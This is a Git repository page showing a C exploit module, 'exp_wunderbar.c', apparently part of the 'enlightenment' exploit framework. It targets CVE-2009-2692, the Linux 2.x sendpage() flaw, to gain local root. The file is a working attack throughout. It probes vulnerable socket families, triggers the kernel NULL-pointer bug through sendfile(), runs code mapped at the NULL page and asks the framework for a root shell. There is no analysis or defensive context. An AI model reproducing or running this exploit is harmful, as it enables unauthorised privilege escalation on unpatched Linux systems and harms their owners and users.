cadey
/
enlightenment
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
enlightenment/exp_wunderbar.c

90 lines
2.2 KiB
C
Raw Permalink Blame History

/* wunderbar */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sendfile.h>
#include "exp_framework.h"
struct exploit_state *exp_state;
#define DOMAINS_STOP -1
#define VIDEO_SIZE 4171600
#ifndef IPPROTO_SCTP
#define IPPROTO_SCTP 132
#endif
#ifndef PX_PROTO_OL2TP
#define PX_PROTO_OL2TP 1
#endif
#ifndef PF_IUCV
#define PF_IUCV 32
#endif
const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 },
{PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 },
{PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 },
{PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 },
{PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP },
{PF_PPPOX, SOCK_DGRAM, 0 },
{PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP },
{DOMAINS_STOP, 0, 0 }
};
char *desc = "Wunderbar Emporium: Linux 2.X sendpage() local root";
char *cve = "CVE-2009-2692";
int prepare(unsigned char *buf)
{
return STRAIGHT_UP_EXECUTION_AT_NULL;
}
int requires_null_page = 1;
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
int trigger(void)
{
while (exp_state->got_ring0 == 0) {
char template[] = "/tmp/sendfile.XXXXXX";
int d;
int in, out;
// Setup source descriptor
if ((in = mkstemp(template)) < 0) {
fprintf(stdout, "failed to open input descriptor, %m\n");
return 0;
}
unlink(template);
// Find a vulnerable domain
for (d = 0; domains[d][0] != DOMAINS_STOP; d++) {
if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0)
break;
}
if (out < 0) {
fprintf(stdout, "unable to find a vulnerable domain, sorry\n");
return 0;
}
// Truncate input file to some large value
ftruncate(in, getpagesize());
// sendfile() to trigger the bug.
sendfile(out, in, NULL, getpagesize());
}
return 1;
}
int post(void)
{
return RUN_ROOTSHELL;
}
Reference in New Issue View Git Blame Copy Permalink